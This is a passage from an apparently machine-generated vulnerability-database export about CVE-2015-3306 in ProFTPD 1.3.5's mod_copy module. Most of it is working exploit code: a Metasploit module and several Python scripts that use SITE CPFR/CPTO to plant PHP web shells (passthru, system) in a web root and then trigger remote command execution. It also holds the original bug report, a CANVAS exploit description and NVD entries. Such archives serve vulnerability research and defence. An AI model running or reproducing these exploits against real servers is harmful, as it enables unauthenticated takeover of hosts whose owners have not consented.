\n}, \n'Author' => \n[ \n'Vadim Melihow', # Original discovery, Proof of Concept \n'xistence <xistence[at]0x90.nl>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-3306' ], \n[ 'EDB', '36742' ] \n], \n'Privileged' => false, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'BadChars' => '', \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic gawk bash python perl' \n} \n}, \n'Targets' => \n[ \n[ 'ProFTPD 1.3.5', { } ] \n], \n'DisclosureDate' => 'Apr 22 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('RPORT', [true, 'HTTP port', 80]), \nOptPort.new('RPORT_FTP', [true, 'FTP port', 21]), \nOptString.new('TARGETURI', [true, 'Base path to the website', '/']), \nOptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), \nOptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) \n], self.class) \nend \n \ndef check \nftp_port = datastore['RPORT_FTP'] \nsock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) \n \nif sock.nil? \nfail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\") \nelse \nprint_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\") \nend \n \nres = sock.get_once(-1, 10) \nunless res && res.include?('220') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\") \nend \n \nsock.puts(\"SITE CPFR /etc/passwd\\r\\n\") \nres = sock.get_once(-1, 10) \nif res && res.include?('350') \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \nftp_port = datastore['RPORT_FTP'] \nget_arg = rand_text_alphanumeric(5+rand(3)) \npayload_name = rand_text_alphanumeric(5+rand(3)) + '.php' \n \nsock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) \n \nif sock.nil? 
\nfail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\") \nelse \nprint_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\") \nend \n \nres = sock.get_once(-1, 10) \nunless res && res.include?('220') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\") \nend \n \nprint_status(\"#{rhost}:#{ftp_port} - Sending copy commands to FTP server\") \n \nsock.puts(\"SITE CPFR /proc/self/cmdline\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('350') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline\") \nend \n \nsock.put(\"SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('250') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying to temporary payload file\") \nend \n \nsock.put(\"SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('350') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from temporary payload file\") \nend \n \nsock.put(\"SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\\r\\n\") \nres = sock.get_once(-1, 10) \nunless res && res.include?('250') \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?\") \nend \n \nsock.close \n \nprint_status(\"#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}\") \nres = send_request_cgi!( \n'uri' => normalize_uri(target_uri.path, payload_name), \n'method' => 'GET', \n'vars_get' => { get_arg => \"nohup #{payload.encoded} &\" } \n) \n \nunless res && res.code == 200 \nfail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure executing payload\") \nend \nend \n \nend \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/132218/proftpd_modcopy_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:38", "description": "", "cvss3": {}, "published": "2015-04-22T00:00:00", "type": "packetstorm", "title": "ProFTPd CPFR / CPTO Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-22T00:00:00", "id": "PACKETSTORM:131567", "href": "https://packetstormsecurity.com/files/131567/ProFTPd-CPFR-CPTO-Proof-Of-Concept.html", "sourceData": "`''' \n*** for educational purpouse ONLY! *** \n \nc0ded by daldana. (daniel.aldana.moreno ___at__ gmail.com) \nplease, first read https://github.com/chcx/cpx_proftpd/ \n''' \n \n \nimport sys \nfrom ftplib import FTP \n \n \ndef main(argv): \n \n \nif len(argv) == 4: \nip = argv[1] \nsrc = argv[2] \ndst = argv[3] \noption = 1 \n \nelif len(argv) == 3: \nip = argv[1] \ndst = argv[2] \noption = 2 \n \nelse: \nprint 'please check the readme file.-' \nsys.exit(2) \n \ntry: \nftp = FTP(ip) \n \nexcept: \nprint 'connection refused.-' \nsys.exit(2) \n \n \nif option == 1: \n \nprint 'YOU ARE TRYING METHOD ONE:' \n \ncmd1 = 'SITE CPFR ' + src \ncmd2 = 'SITE CPTO ' + dst \n \n \ntry: \nres1 = ftp.sendcmd(cmd1) \nexcept: \nprint 'NO SUCH FILE :(' \nsys.exit(2) \n \n \ntry: \nres2 = ftp.sendcmd(cmd2) \nprint 'NICE! TRY NOW! 
:)' \n \nexcept: \nprint 'YOU DON\\'T HAVE PERMISSION :(' \nsys.exit(2) \n \n \nif option == 2: \nprint 'YOU ARE TRYING METHOD TWO:' \ncmd1 = 'SITE CPFR /proc/self/cmdline' \ncmd2 = 'SITE CPTO /tmp/...<?php passthru($_GET[\\'img\\']);?>' \ncmd3 = 'SITE CPFR /tmp/...<?php passthru($_GET[\\'img\\']);?>' \ncmd4 = 'SITE CPTO ' + dst + '/lndex.php' \nprint 'UPLOADING in ' + dst + '/lndex.php' \n \n \ntry: \nres1 = ftp.sendcmd(cmd1) \nexcept: \nprint 'NO SUCH FILE OR PERMISSION FOR CMDLINE :(' \nsys.exit(2) \n \n \ntry: \nres2 = ftp.sendcmd(cmd2) \nexcept: \nprint 'YOU DON\\'T HAVE PERMISSION :(' \nsys.exit(2) \n \ntry: \nres3 = ftp.sendcmd(cmd3) \nres4 = ftp.sendcmd(cmd4) \nprint 'NICE! TRY NOW! :)' \n \nexcept: \nprint 'PROBLEMS ;(' \n \n \n \n \n \nif __name__ == \"__main__\": \nmain(sys.argv) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/131567/cpx_proftp.py.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-05-26T18:01:57", "description": "", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "packetstorm", "title": "ProFTPd 1.3.5 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-05-26T00:00:00", "id": "PACKETSTORM:162777", "href": "https://packetstormsecurity.com/files/162777/ProFTPd-1.3.5-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) \n# Date: 25/05/2021 \n# Exploit Author: Shellbr3ak \n# Version: 1.3.5 \n# Tested on: Ubuntu 16.04.6 LTS \n# CVE : CVE-2015-3306 \n \n#!/usr/bin/env python3 \n \nimport sys \nimport socket \nimport requests \n \ndef exploit(client, target): \nclient.connect((target,21)) # Connecting to the target server \nbanner = client.recv(74) \nprint(banner.decode()) \nclient.send(b'site cpfr /etc/passwd\\r\\n') \nprint(client.recv(1024).decode()) \nclient.send(b'site cpto <?php phpinfo(); ?>\\r\\n') # 
phpinfo() is just a PoC. \nprint(client.recv(1024).decode()) \nclient.send(b'site cpfr /proc/self/fd/3\\r\\n') \nprint(client.recv(1024).decode()) \nclient.send(b'site cpto /var/www/html/test.php\\r\\n') \nprint(client.recv(1024).decode()) \nclient.close() \nprint('Exploit Completed') \n \ndef check(url): \nreq = requests.get(url) # Requesting the written PoC php file via HTTP \nif req.status_code == 200: \nprint('[+] File Written Successfully') \nprint(f'[+] Go to : {url}') \nelse: \nprint('[!] Something Went Wrong') \nprint('[!] Directory might not be writable') \n \ndef main(): \nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntarget = sys.argv[1] \nexploit(client, target) \nurl = 'http://' + target + '/test.php' \ncheck(url) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162777/proftpd135modcopy-exec.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-05T22:22:24", "description": "", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "packetstorm", "title": "ProFTPd 1.3.5 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-21T00:00:00", "id": "PACKETSTORM:131555", "href": "https://packetstormsecurity.com/files/131555/ProFTPd-1.3.5-Remote-Command-Execution.html", "sourceData": "`# Title: ProFTPd 1.3.5 Remote Command Execution \n# Date : 20/04/2015 \n# Author: R-73eN \n# Software: ProFTPd 1.3.5 with mod_copy \n# Tested : Kali Linux 1.06 \n# CVE : 2015-3306 \n# Greetz to Vadim Melihow for all the hard work . 
\nimport socket \nimport sys \nimport requests \n#Banner \nbanner = \"\" \nbanner += \" ___ __ ____ _ _ \\n\" \nbanner +=\" |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \\n\" \nbanner +=\" | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \\n\" \nbanner +=\" | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \\n\" \nbanner +=\" |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\\n\\n\" \nprint banner \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nif(len(sys.argv) < 4): \nprint '\\n Usage : exploit.py server directory cmd' \nelse: \nserver = sys.argv[1] #Vulnerable Server \ndirectory = sys.argv[2] # Path accessible from web ..... \ncmd = sys.argv[3] #PHP payload to be executed \nevil = '<?php system(\"' + cmd + '\") ?>' \ns.connect((server, 21)) \ns.recv(1024) \nprint '[ + ] Connected to server [ + ] \\n' \ns.send('site cpfr /etc/passwd') \ns.recv(1024) \ns.send('site cpto ' + evil) \ns.recv(1024) \ns.send('site cpfr /proc/self/fd/3') \ns.recv(1024) \ns.send('site cpto ' + directory + 'infogen.php') \ns.recv(1024) \ns.close() \nprint '[ + ] Payload sended [ + ]\\n' \nprint '[ + ] Executing Payload [ + ]\\n' \nr = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP \nif (r.status_code == 200): \nprint '[ * ] Payload Executed Succesfully [ * ]' \nelse: \nprint ' [ - ] Error : ' + str(r.status_code) + ' [ - ]' \n \nprint '\\n http://infogen.al/' \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/131555/proftpd135-exec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:18:08", "description": "", "cvss3": {}, "published": "2015-04-18T00:00:00", "type": "packetstorm", "title": "ProFTPd 1.3.5 File Copy", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-18T00:00:00", "id": "PACKETSTORM:131505", "href": "https://packetstormsecurity.com/files/131505/ProFTPd-1.3.5-File-Copy.html", 
"sourceData": "`Description TJ Saunders 2015-04-07 16:35:03 UTC \nVadim Melihow reported a critical issue with proftpd installations that use the \nmod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands \nto be used by *unauthenticated clients*: \n \n--------------------------------- \nTrying 80.150.216.115... \nConnected to 80.150.216.115. \nEscape character is '^]'. \n220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115] \nsite help \n214-The following SITE commands are recognized (* =>'s unimplemented) \n214-CPFR <sp> pathname \n214-CPTO <sp> pathname \n214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path \n214-SYMLINK <sp> source <sp> destination \n214-RMDIR <sp> path \n214-MKDIR <sp> path \n214-The following SITE extensions are recognized: \n214-RATIO -- show all ratios in effect \n214-QUOTA \n214-HELP \n214-CHGRP \n214-CHMOD \n214 Direct comments to root@www01a \nsite cpfr /etc/passwd \n350 File or directory exists, ready for destination name \nsite cpto /tmp/passwd.copy \n250 Copy successful \n----------------------------------------- \n \nHe provides another, scarier example: \n \n------------------------------ \nsite cpfr /etc/passwd \n350 File or directory exists, ready for destination name \nsite cpto <?php phpinfo(); ?> \n550 cpto: Permission denied \nsite cpfr /proc/self/fd/3 \n350 File or directory exists, ready for destination name \nsite cpto /var/www/test.php \n \ntest.php now contains \n---------------------- \n2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q \n(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument \n2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q \n(slon-P5Q.lan[192.168.3.193]): FTP session opened. 
\n2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q \n(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php \nphpinfo(); ?>' for copying: Permission denied \n----------------------- \n \ntest.php contains correct php script \"<?php phpinfo(); ?>\" which \ncan be run by the php interpreter \n \nSource: http://bugs.proftpd.org/show_bug.cgi?id=4169 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/131505/proftpd135-filecopy.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:13", "edition": 3, "description": "**Name**| proftpd_mod_copy \n---|--- \n**CVE**| CVE-2015-3306 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ProFTPd 1.3.5 Remote File Copy \n**Notes**| CVE Name: CVE-2015-3306 \nVENDOR: \nNOTES: \n \nThis exploit abuses the commands of the mod_copy module in ProFTPd (version <= 1.3.5). The SITE CPFR/CPTO commands can be used by unauthenticated clients to copy files from any part of the filesystem to a chosen destination. With these commands the mod_copy module allows remote attackers to read and write local files. \nIn the first part of the attack, the exploit copies /proc/self/cmdline to the /tmp/ folder with a PHP payload as the filename, then copies this file to the webroot as a PHP file. \nThe second part of the attack involves making a GET request to the PHP file just created with the PHP shellcode as a parameter. The payload created in the first part will execute the PHP \nshellcode. \n \nNote about the target: \nTo exploit this vulnerability, the mod_copy module must be compiled with the ProFTPd sources. We also need write privileges on the webroot folder we choose (unless the FTP server was started as root). \nThen we must assume that the webserver has a PHP module. \n \n \nThis exploit has been tested on: \n* Ubuntu 13.04 - Linux 3.8.0-19-generic x64. 
(Successful exploitation) \n \n \nCommand line usage: \n$ ./commandlineInterface.py -l 172.16.135.238 -p5556 -v 7 \n$ python ./exploits/remote/unix/proftpd_mod_copy/proftpd_mod_copy.py -t 172.16.135.238 -l 172.16.135.1 -d 5556 \n \n \nRepeatability: Infinite \nReferences: http://bugs.proftpd.org/show_bug.cgi?id=4169 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306 \nCERT Advisory: None \nDate Public: 05/18/2015 \nCVSS: 10 \n\n", "cvss3": {}, "published": "2015-05-18T15:59:00", "type": "canvas", "title": "Immunity Canvas: PROFTPD_MOD_COPY", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-18T15:59:00", "id": "PROFTPD_MOD_COPY", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2022-06-06T16:49:30", "description": "", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "zdt", "title": "ProFTPd 1.3.5 - (mod_copy) Remote Command Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2021-05-26T00:00:00", "id": "1337DAY-ID-36298", "href": "https://0day.today/exploit/description/36298", "sourceData": "# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)\n# Exploit Author: Shellbr3ak\n# Version: 1.3.5 \n# Tested on: Ubuntu 16.04.6 LTS\n# CVE : CVE-2015-3306\n\n#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport requests\n\ndef exploit(client, target):\n client.connect((target,21)) # Connecting to the target server\n banner = client.recv(74)\n print(banner.decode())\n client.send(b'site cpfr /etc/passwd\\r\\n')\n print(client.recv(1024).decode())\n client.send(b'site cpto <?php phpinfo(); ?>\\r\\n') # phpinfo() is just a PoC.\n print(client.recv(1024).decode())\n client.send(b'site cpfr /proc/self/fd/3\\r\\n')\n print(client.recv(1024).decode())\n client.send(b'site cpto /var/www/html/test.php\\r\\n')\n print(client.recv(1024).decode())\n client.close()\n print('Exploit Completed')\n\ndef check(url):\n req = requests.get(url) # Requesting the written PoC php file via HTTP\n if req.status_code == 200:\n print('[+] File Written Successfully')\n print(f'[+] Go to : {url}')\n else:\n print('[!] Something Went Wrong')\n print('[!] Directory might not be writable')\n\ndef main():\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n target = sys.argv[1]\n exploit(client, target)\n url = 'http://' + target + '/test.php'\n check(url)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36298", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-09T23:21:26", "description": "This Metasploit module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. 
The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.", "cvss3": {}, "published": "2015-06-10T00:00:00", "type": "zdt", "title": "ProFTPD 1.3.5 Mod_Copy Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-06-10T00:00:00", "id": "1337DAY-ID-23720", "href": "https://0day.today/exploit/description/23720", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution',\r\n 'Description' => %q{\r\n This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.\r\n Any unauthenticated client can leverage these commands to copy files from any\r\n part of the filesystem to a chosen destination. The copy commands are executed with\r\n the rights of the ProFTPD service, which by default runs under the privileges of the\r\n 'nobody' user. 
By using /proc/self/cmdline to copy a PHP payload to the website\r\n directory, PHP remote code execution is made possible.\r\n },\r\n 'Author' =>\r\n [\r\n 'Vadim Melihow', # Original discovery, Proof of Concept\r\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-3306' ],\r\n [ 'EDB', '36742' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'unix' ],\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'BadChars' => '',\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic gawk bash python perl'\r\n }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'ProFTPD 1.3.5', { } ]\r\n ],\r\n 'DisclosureDate' => 'Apr 22 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptPort.new('RPORT', [true, 'HTTP port', 80]),\r\n OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),\r\n OptString.new('TARGETURI', [true, 'Base path to the website', '/']),\r\n OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),\r\n OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n ftp_port = datastore['RPORT_FTP']\r\n sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)\r\n\r\n if sock.nil?\r\n fail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\")\r\n else\r\n print_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\")\r\n end\r\n\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('220')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\")\r\n end\r\n\r\n sock.puts(\"SITE CPFR /etc/passwd\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n if res && res.include?('350')\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n ftp_port = datastore['RPORT_FTP']\r\n get_arg = rand_text_alphanumeric(5+rand(3))\r\n 
payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'\r\n\r\n sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)\r\n\r\n if sock.nil?\r\n fail_with(Failure::Unreachable, \"#{rhost}:#{ftp_port} - Failed to connect to FTP server\")\r\n else\r\n print_status(\"#{rhost}:#{ftp_port} - Connected to FTP server\")\r\n end\r\n\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('220')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{ftp_port} - Sending copy commands to FTP server\")\r\n\r\n sock.puts(\"SITE CPFR /proc/self/cmdline\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('350')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline\")\r\n end\r\n\r\n sock.put(\"SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('250')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying to temporary payload file\")\r\n end\r\n\r\n sock.put(\"SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\\'#{get_arg}\\']);?>\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('350')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying from temporary payload file\")\r\n end\r\n\r\n sock.put(\"SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\\r\\n\")\r\n res = sock.get_once(-1, 10)\r\n unless res && res.include?('250')\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?\")\r\n end\r\n\r\n sock.close\r\n\r\n print_status(\"#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}\")\r\n res = send_request_cgi!(\r\n 'uri' => normalize_uri(target_uri.path, payload_name),\r\n 'method' => 'GET',\r\n 'vars_get' => { get_arg => \"nohup #{payload.encoded} &\" }\r\n 
)\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::Unknown, \"#{rhost}:#{ftp_port} - Failure executing payload\")\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/23720", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T09:05:19", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "zdt", "title": "ProFTPd 1.3.5 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-21T00:00:00", "id": "1337DAY-ID-23544", "href": "https://0day.today/exploit/description/23544", "sourceData": "# Title: ProFTPd 1.3.5 Remote Command Execution\r\n# Date : 20/04/2015\r\n# Author: R-73eN\r\n# Software: ProFTPd 1.3.5 with mod_copy\r\n# Tested : Kali Linux 1.06\r\n# CVE : 2015-3306\r\n# Greetz to Vadim Melihow for all the hard work .\r\nimport socket\r\nimport sys\r\nimport requests\r\n#Banner\r\nbanner = \"\"\r\nbanner += \" ___ __ ____ _ _ \\n\" \r\nbanner +=\" |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \\n\"\r\nbanner +=\" | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \\n\"\r\nbanner +=\" | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \\n\"\r\nbanner +=\" |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\\n\\n\"\r\nprint banner\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nif(len(sys.argv) < 4):\r\n print '\\n Usage : exploit.py server directory cmd'\r\nelse:\r\n server = sys.argv[1] #Vulnerable Server\r\n directory = sys.argv[2] # Path accessible from web .....\r\n cmd = sys.argv[3] #PHP payload to be executed\r\n evil = '<?php system(\"' + cmd + '\") ?>'\r\n s.connect((server, 21))\r\n s.recv(1024)\r\n print '[ + ] Connected to server [ + ] \\n'\r\n s.send('site cpfr /etc/passwd')\r\n s.recv(1024)\r\n s.send('site cpto ' + evil)\r\n s.recv(1024)\r\n s.send('site cpfr 
/proc/self/fd/3')\r\n s.recv(1024)\r\n s.send('site cpto ' + directory + 'infogen.php')\r\n s.recv(1024)\r\n s.close()\r\n print '[ + ] Payload sended [ + ]\\n'\r\n print '[ + ] Executing Payload [ + ]\\n'\r\n r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP\r\n if (r.status_code == 200):\r\n print '[ * ] Payload Executed Succesfully [ * ]'\r\n else:\r\n print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'\r\n \r\nprint '\\n http://infogen.al/'\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/23544", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T12:28:33", "description": "The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.", "cvss3": {}, "published": "2015-05-18T15:59:00", "type": "cve", "title": "CVE-2015-3306", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2021-05-26T20:15:00", "cpe": ["cpe:/a:proftpd:proftpd:1.3.5"], "id": "CVE-2015-3306", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:59:17", "description": "An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information 
